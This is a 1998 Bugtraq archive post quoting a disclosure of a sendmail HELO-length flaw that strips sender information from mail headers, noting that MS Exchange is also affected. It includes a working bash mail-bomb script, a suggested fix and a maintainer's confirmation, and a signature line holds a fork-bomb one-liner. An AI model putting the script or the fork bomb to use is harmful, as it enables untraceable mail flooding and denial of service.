Bugtraq mailing list archives
MS Exchange vulnerable. (was: about sendmail 8.8.8 HELO hole)
From: yury () BISTBN COM (Yuri Krichevsky)
Date: Wed, 27 May 1998 21:06:17 +0300
Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too. -- "BSD code sucks. Of course, everything else sucks far more." - Theo de Raadt (OpenBSD President)
-----Original Message----- From: Micha? Zalewski <lcamtuf () boss staszic waw pl> To: info () rootshell com <info () rootshell com> Date: 10 stycznia 1998 12:28 Subject: Sendmail 8.8.8 (qmail?) HELO hole. Here's a brief description of Sendmail (qmail) hole I found recently: When someone mailbombs you, or tries to send fakemail, spam, etc - sendmail normally attachs sender's host name and it's address to outgoing message: --From spam () flooders net Mon Jan 5 22:08:21 1998Received: from spammer (marc () math university edu [150.129.84.5]) by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 Date: Mon, 5 Jan 1998 22:07:54 +0100 From: spam () flooders net Message-Id: <3.14159665@pi> MAILBOOM!!! -- That's perfect - now you know, who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc () math university edu [150.129.84.5])". Nothing easier... But I found a small hole, which allows user to hide it's personality, and send mails anonymously. The only thing you should do is to pass HELO string longer than approx. 1024 B - sender's location and other very useful information will be cropped!!! Message headers should become not interesting. Sometimes, sender may become quite untraceable (but not always, if it's possible to obtain logs from machine which has been used to sent): --From spam () flooders net Mon Jan 5 22:09:05 1998Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx Date: Mon, 5 Jan 1998 22:08:52 +0100 From: spam () flooders net Message-Id: <3.14159665@pi> MAILBOOM!!! Now guess who am I... -- Here's a simple example of Sendmail's HELO hole usage. Note, this script has been written ONLY to show how easy may be sending fakemails, mailbombs, with cooperation of Sendmail ;) Script is very slow and restricted in many ways, but explains the problem well (note, some of non-Berkeley daemons are also affected, probably Qmail?): -- EXPLOIT CODE -- #!/bin/bash TMPDIR=/tmp/`whoami` PLIK=$TMPDIR/.safe TIMEOUT=2 LIMIT=10 MAX=20 echo echo "SafeBomb 1.02b -- sendmail HELO hole usage example" echo "Author: Michal Zalewski <lcamtuf () boss staszic waw pl>" echo if [ "$4" = "" ]; then echo "USAGE: $0 msgfile address server sender" echo echo " msgfile - file to send as a message body" echo " address - address of lucky recipient" echo " server - outgoing smtp server w/sendmail" echo " sender - introduce yourself" echo echo "WARNING: For educational use ONLY. Mailbombing is illegal." echo "Think twice BEFORE you use this program in any way. Also," echo "I've never said this program is 100% safe nor bug-free." echo sleep 1 exit 0 fi if [ ! -f $1 ]; then echo "Message file not found." echo exit 0 fi echo -n "Preparing message..." mkdir $TMPDIR &>/dev/null chmod 700 $TMPDIR echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb_\"" >$PLIK echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK echo "echo \"rcpt to: $2\"" >>$PLIK echo "echo \"data\"" >>$PLIK echo "cat <<__qniec__" >>$PLIK cat $1 >>$PLIK echo "__qniec__" >>$PLIK echo "echo \".\"" >>$PLIK echo "echo \"quit\"" >>$PLIK echo "sleep $TIMEOUT" >>$PLIK chmod +x $PLIK echo "OK" echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." SENT=0 while [ -f $1 ]; do $PLIK|telnet $3 25 &>/dev/null & let SENT=SENT+1 echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" CONNECTED=`ps|grep -c "telnet $3"` if [ "$LIMIT" -le "$CONNECTED" ]; then while [ "$LIMIT" -le "$CONNECTED" ]; do sleep 1 done fi if [ "$SENT" -ge "$MAX" ]; then echo "It's just an example, sorry." echo exit 0 fi done -- EOF -- Suggested fix: insert additional length limit into HELO/EHLO parameter scanning routine OR disable AllowBogusHELO (but it may cause serious troubles). I have no 8.8.8 sources at the time, so execuse me if it's unclear. PS: -- From: Gregory Neil Shapiro <sendmail+gshapiro () sendmail org> I was able to reproduce the header problem by lengthening the HELO string in your script. [...] This will be fixed in sendmail 8.9. -- _______________________________________________________________________ Micha? Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl] IterowaĆ jest rzecz+ ludzk+, wykonywaĆ rekursywnie - bosk+ [P. Deustch] =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
Current thread:
- about sendmail 8.8.8 HELO hole Valentin Pavlov (May 22)
- about sendmail 8.8.8 HELO hole Gregory Neil Shapiro (May 26)
- Re: about sendmail 8.8.8 HELO hole Zach White (May 26)
- Problem with ascend pipeline routers. Eric Thacker (May 26)
- Re: Problem with ascend pipeline routers. Joe Shaw (May 28)
- Ascend Pipeline DoS Jeff Wheeler (May 29)
- MS Exchange vulnerable. (was: about sendmail 8.8.8 HELO hole) Yuri Krichevsky (May 27)